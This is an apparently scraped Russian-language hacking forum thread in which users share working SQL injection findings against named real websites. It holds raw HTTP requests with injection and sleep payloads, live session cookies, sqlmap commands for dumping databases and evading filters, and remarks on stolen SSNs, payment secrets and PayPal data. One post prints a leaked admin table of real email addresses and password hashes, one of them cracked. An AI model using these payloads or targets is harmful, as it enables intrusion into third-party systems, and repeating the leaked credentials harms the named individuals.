Space2mssqlblank
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Найденные интересеные SQL inj & XSS
- Автор темы Xrenovi4
- Дата начала
А этим что делать ifnull2ifisnull не помогает (
Чтобы не пихать свое мнение, сошлюсь на официальный FAQ sqlmap:
Авторы мапы считают, что пользователь должен сам своими руками и головой дойти до понимания, какой обход ему требуется. Когда он понимает, что может пробить WAF, тогда может спокойно выбрать тампер подходящий из представленного списка или написать свой, если такого нет. Нужно найти за что цепляется WAF. А тут выходит, что пальцем в небо тыкать не зная всех параметров.
Авторы мапы считают, что пользователь должен сам своими руками и головой дойти до понимания, какой обход ему требуется. Когда он понимает, что может пробить WAF, тогда может спокойно выбрать тампер подходящий из представленного списка или написать свой, если такого нет. Нужно найти за что цепляется WAF. А тут выходит, что пальцем в небо тыкать не зная всех параметров.
Последнее редактирование:
вот подробно расписано какой и что делает
Вложения
Из-за чего возникает? Что с этим делать?
sqlmap
попробуй команду --ignore-redirects
POST /personal/F_pass.php HTTP/1.1Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcwAccept: */*X-Requested-With: XMLHttpRequestReferer: https://grouper.world-link.org/personal/fgPW.phpContent-Length: 233Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: grouper.world-link.orgConnection: Keep-alive------------YWJkMTQzNDcwContent-Disposition: form-data; name="account"-1' OR 3*2*1=6 AND 00070=00070 -- ------------YWJkMTQzNDcwContent-Disposition: form-data; name="email"testing@example.com------------YWJkMTQzNDcw--
POST /hrm/models/erecruit_model.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
X-Requested-With: XMLHttpRequest
Referer: https://www.acbf-pact.org/
Cookie: SSESS9b5413b684f50918a23fde1137d8a097=kxwoUdYIj8Bw4S7KZgYar-pKC_uSLDe_RstjThG6YlM
Content-Length: 366
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: www.acbf-pact.org
Connection: Keep-alive
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="Method"
upload_doc
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fu_certificate_one"; filename="@@2CLD7"
Content-Type: image/png
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="hd_attribute"
-1' OR 3*2*1=6 AND 000151=000151 --
------------YWJkMTQzNDcw--
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
X-Requested-With: XMLHttpRequest
Referer: https://www.acbf-pact.org/
Cookie: SSESS9b5413b684f50918a23fde1137d8a097=kxwoUdYIj8Bw4S7KZgYar-pKC_uSLDe_RstjThG6YlM
Content-Length: 366
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: www.acbf-pact.org
Connection: Keep-alive
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="Method"
upload_doc
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fu_certificate_one"; filename="@@2CLD7"
Content-Type: image/png
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="hd_attribute"
-1' OR 3*2*1=6 AND 000151=000151 --
------------YWJkMTQzNDcw--
POST /home/services/fgpw_sent.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: https://www.siamcomic.com/home/services/fgpw.php
Cookie: PHPSESSID=v74ljljquq56om9ff1aomk3tu6
Content-Length: 169
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: www.siamcomic.com
Connection: Keep-alive
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="contactmail"
testing@example.com0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
------------YWJkMTQzNDcw--
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: https://www.siamcomic.com/home/services/fgpw.php
Cookie: PHPSESSID=v74ljljquq56om9ff1aomk3tu6
Content-Length: 169
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: www.siamcomic.com
Connection: Keep-alive
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="contactmail"
testing@example.com0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
------------YWJkMTQzNDcw--
GET /show_add.php?id_add=(select(0)from(select(sleep(9.272)))v)/*'%2B(select(0)from(select(sleep(9.272)))v)%2B'"%2B(select(0)from(select(sleep(9.272)))v)%2B"*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://46.151.215.12/frgt.php
Cookie: PHPSESSID=ea3f7a15c87a8a1aea2742b5081bb710
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: 46.151.215.12
Connection: Keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://46.151.215.12/frgt.php
Cookie: PHPSESSID=ea3f7a15c87a8a1aea2742b5081bb710
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: 46.151.215.12
Connection: Keep-alive
POST /eis/forgot.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://www.eutaw.us/eis/forgot.php
Cookie: PHPSESSID=5cfm5mfvu56j3omd5sn5rsdj04
Content-Length: 78
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: www.eutaw.us
Connection: Keep-alive
birthday=-1'%20OR%203*2*1=6%20AND%20000871=000871%20--%20&sin=u]H[ww6KrA9F.x-F
---------------------------------------------------
около 10к работников. мапа в этом деле видит юнион. таблиц столько что я просто замучался искать ссны. видел там добы и длки точно. ничего не трогал
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://www.eutaw.us/eis/forgot.php
Cookie: PHPSESSID=5cfm5mfvu56j3omd5sn5rsdj04
Content-Length: 78
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: www.eutaw.us
Connection: Keep-alive
birthday=-1'%20OR%203*2*1=6%20AND%20000871=000871%20--%20&sin=u]H[ww6KrA9F.x-F
---------------------------------------------------
около 10к работников. мапа в этом деле видит юнион. таблиц столько что я просто замучался искать ссны. видел там добы и длки точно. ничего не трогал
GET /products.php?id=-1'%20OR%203*2*1=6%20AND%20000725=000725%20--%20 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.neutronics.co.in/products.php?id=7
Cookie: PHPSESSID=c415b756b242d02ba131014235065656; humans_21909=1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: www.neutronics.co.in
Connection: Keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://www.neutronics.co.in/products.php?id=7
Cookie: PHPSESSID=c415b756b242d02ba131014235065656; humans_21909=1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: www.neutronics.co.in
Connection: Keep-alive
GET /quote-form.php?pid=-1'%20OR%203*2*1=6%20AND%2000067=00067%20--%20 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://dicoproducts.com/products.php?pid=7600500
Cookie: PHPSESSID=hcjdvch2fughogbeddem6bthe0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: dicoproducts.com
Connection: Keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://dicoproducts.com/products.php?pid=7600500
Cookie: PHPSESSID=hcjdvch2fughogbeddem6bthe0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: dicoproducts.com
Connection: Keep-alive
POST /search.php HTTP/1.1
Referer: https://www.zazprodukte.de/products.php?id=1
Cookie: PHPSESSID=mrit9mbfbsb40g6g18f1g7spq3; i_agree=yes; googtrans=/en/ja; googtrans=/en/ja
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: www.zazprodukte.de
Connection: Keep-alive
keyword=1'"
Referer: https://www.zazprodukte.de/products.php?id=1
Cookie: PHPSESSID=mrit9mbfbsb40g6g18f1g7spq3; i_agree=yes; googtrans=/en/ja; googtrans=/en/ja
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: www.zazprodukte.de
Connection: Keep-alive
keyword=1'"
GET /product.php?id=-1'%20OR%203*2*1=6%20AND%20000749=000749%20--%20 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://crownindustries.co.in/product.php?id=43
Cookie: PHPSESSID=6vsb6ld0b3r2i8au7f57siaom1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: crownindustries.co.in
Connection: Keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://crownindustries.co.in/product.php?id=43
Cookie: PHPSESSID=6vsb6ld0b3r2i8au7f57siaom1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: crownindustries.co.in
Connection: Keep-alive
GET /tag.php?id=(select(0)from(select(sleep(12.322)))v)/*'%2B(select(0)from(select(sleep(12.322)))v)%2B'"%2B(select(0)from(select(sleep(12.322)))v)%2B"*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.iqboard.net/product-list.php?id=7
Cookie: twk_idm_key=3UbwppY5MEUsIHNfjSxyc; TawkConnectionTime=0; twk_uuid_5ca31cf01de11b6e3b066438=%7B%22uuid%22%3A%221.70hVrrNFHz8fPuCgpdlkmgI2JQROHkJvzNcbDtCtSrscPVQIrGiT3MDIVkRW0MJ30DoGoWZ8Pdy76B4dKIz9CkPEefNjyPd5lwLKAwMJs0mFs2jXgf7J%22%2C%22version%22%3A3%2C%22domain%22%3A%22iqboard.net%22%2C%22ts%22%3A1720053370589%7D; cookieyes-consent=consentid:ZHMyZXpoUWlGRUxTMHoxQ0RUc3lsYXJlWGJQZGNXbU4,consent:yes,action:yes,necessary:yes,functional:yes,analytics:yes,performance:yes,advertisement:yes
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: www.iqboard.net
Connection: Keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://www.iqboard.net/product-list.php?id=7
Cookie: twk_idm_key=3UbwppY5MEUsIHNfjSxyc; TawkConnectionTime=0; twk_uuid_5ca31cf01de11b6e3b066438=%7B%22uuid%22%3A%221.70hVrrNFHz8fPuCgpdlkmgI2JQROHkJvzNcbDtCtSrscPVQIrGiT3MDIVkRW0MJ30DoGoWZ8Pdy76B4dKIz9CkPEefNjyPd5lwLKAwMJs0mFs2jXgf7J%22%2C%22version%22%3A3%2C%22domain%22%3A%22iqboard.net%22%2C%22ts%22%3A1720053370589%7D; cookieyes-consent=consentid:ZHMyZXpoUWlGRUxTMHoxQ0RUc3lsYXJlWGJQZGNXbU4,consent:yes,action:yes,necessary:yes,functional:yes,analytics:yes,performance:yes,advertisement:yes
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: www.iqboard.net
Connection: Keep-alive
sqlmap -u 'https://www.commonfolks.in/ajaxfunctions/getAuthorInFocus?id=*' --random-agent --technique=U --batch --threads=10 --dbs
Шоп. Индусы. 200к в мес посещалка. В базе какие-то s3 secret, похоже страйп или чот такое. Еще какая то колонка paypal
Шоп. Индусы. 200к в мес посещалка. В базе какие-то s3 secret, похоже страйп или чот такое. Еще какая то колонка paypal
sqlmap -u "https://www.toppartika.lv/tip-top-produkti/?search=" --dbs --level 5 --risk 3 --random-agent --batch --threads=10 --technique=T --time-sec=3
available databases [4]:
[] admin
[] information_schema
[] toppartika
[] toppartika_pipar
toppartika:содержымое
[16:52:24] [INFO] resumed: 33
[16:52:24] [INFO] resumed: about
[16:52:24] [INFO] resumed: access
[16:52:24] [INFO] resumed: admin_menu_sort
[16:52:24] [INFO] resumed: admin_tds
[16:52:24] [INFO] resumed: admins
[16:52:24] [INFO] resumed: akcijas
[16:52:24] [INFO] resumed: blocks
[16:52:24] [INFO] resumed: calendar
[16:52:24] [INFO] resumed: cooks
[16:52:24] [INFO] resumed: cooks_recipes
[16:52:24] [INFO] resumed: files
[16:52:24] [INFO] resumed: gps
[16:52:24] [INFO] resumed: groups
[16:52:24] [INFO] resumed: ln
[16:52:24] [INFO] resumed: news
[16:52:24] [INFO] resumed: partners
[16:52:24] [INFO] resumed: pic
[16:52:24] [INFO] resumed: products
[16:52:24] [INFO] resumed: products_categories
[16:52:24] [INFO] resumed: regions
[16:52:24] [INFO] resumed: regions_novs
[16:52:24] [INFO] resumed: sales
[16:52:24] [INFO] resumed: sales_periods
[16:52:24] [INFO] resumed: seo
[16:52:24] [INFO] resumed: seopages
[16:52:24] [INFO] resumed: seosettings
[16:52:24] [INFO] resumed: shops
[16:52:24] [INFO] resumed: slides
[16:52:24] [INFO] resumed: staff
[16:52:24] [INFO] resumed: top
[16:52:24] [INFO] resumed: top_log
[16:52:24] [INFO] resumed: txt
[16:52:24] [INFO] resumed: vacancies
[16:52:24] [INFO] resumed: 8
[16:52:24] [INFO] resumed: id
[16:52:24] [INFO] resumed: url
[16:52:24] [INFO] resumed: post
admin: email, pass in sha1
+-----------------------------+----------------------------------------------------------------------------------+
| email | pwd | |
+-----------------------------+---------------------------------------------------------------------------------+
| jelena.sabuna@toppartika.lv | 41ac2781009b17ee11d7c0593ff70a5c1c65368f |
| kristaps.ozolinss@gmail.com | 50716e94927cc555257bfe18c163ea4132d7a27a |
| silvestrs@inostudio.lv | 601f1889667efaebb33b8c12572835da3f027f78 (123123) |
| marketings@toppartika.lv | b5d88592603eaf2b9c51df9bdd49ba8d4b0072f1 |
| agnese.avota@toppartika.lv | d1cd9b51c4ed72e73efa41f888d447c9c92e081f |
| ilze.priedite@toppartika.lv | e6867448e8ad09a3d398a5ff8a4ce8164de266e4 |
+-----------------------------+--------------------------------------------------------------------------------- +
available databases [4]:
[] admin
[] information_schema
[] toppartika
[] toppartika_pipar
toppartika:содержымое
[16:52:24] [INFO] resumed: 33
[16:52:24] [INFO] resumed: about
[16:52:24] [INFO] resumed: access
[16:52:24] [INFO] resumed: admin_menu_sort
[16:52:24] [INFO] resumed: admin_tds
[16:52:24] [INFO] resumed: admins
[16:52:24] [INFO] resumed: akcijas
[16:52:24] [INFO] resumed: blocks
[16:52:24] [INFO] resumed: calendar
[16:52:24] [INFO] resumed: cooks
[16:52:24] [INFO] resumed: cooks_recipes
[16:52:24] [INFO] resumed: files
[16:52:24] [INFO] resumed: gps
[16:52:24] [INFO] resumed: groups
[16:52:24] [INFO] resumed: ln
[16:52:24] [INFO] resumed: news
[16:52:24] [INFO] resumed: partners
[16:52:24] [INFO] resumed: pic
[16:52:24] [INFO] resumed: products
[16:52:24] [INFO] resumed: products_categories
[16:52:24] [INFO] resumed: regions
[16:52:24] [INFO] resumed: regions_novs
[16:52:24] [INFO] resumed: sales
[16:52:24] [INFO] resumed: sales_periods
[16:52:24] [INFO] resumed: seo
[16:52:24] [INFO] resumed: seopages
[16:52:24] [INFO] resumed: seosettings
[16:52:24] [INFO] resumed: shops
[16:52:24] [INFO] resumed: slides
[16:52:24] [INFO] resumed: staff
[16:52:24] [INFO] resumed: top
[16:52:24] [INFO] resumed: top_log
[16:52:24] [INFO] resumed: txt
[16:52:24] [INFO] resumed: vacancies
[16:52:24] [INFO] resumed: 8
[16:52:24] [INFO] resumed: id
[16:52:24] [INFO] resumed: url
[16:52:24] [INFO] resumed: post
admin: email, pass in sha1
+-----------------------------+----------------------------------------------------------------------------------+
| email | pwd | |
+-----------------------------+---------------------------------------------------------------------------------+
| jelena.sabuna@toppartika.lv | 41ac2781009b17ee11d7c0593ff70a5c1c65368f |
| kristaps.ozolinss@gmail.com | 50716e94927cc555257bfe18c163ea4132d7a27a |
| silvestrs@inostudio.lv | 601f1889667efaebb33b8c12572835da3f027f78 (123123) |
| marketings@toppartika.lv | b5d88592603eaf2b9c51df9bdd49ba8d4b0072f1 |
| agnese.avota@toppartika.lv | d1cd9b51c4ed72e73efa41f888d447c9c92e081f |
| ilze.priedite@toppartika.lv | e6867448e8ad09a3d398a5ff8a4ce8164de266e4 |
+-----------------------------+--------------------------------------------------------------------------------- +
33 колонки за 1 секунду с tqchnique=T? это типа защита от скрипт кидди?
нет это типо я 2 дня назад чекал её и отдолжыл часть базы а сейчас ввел команду что бы всё отоброзилось а то я не записал вывод)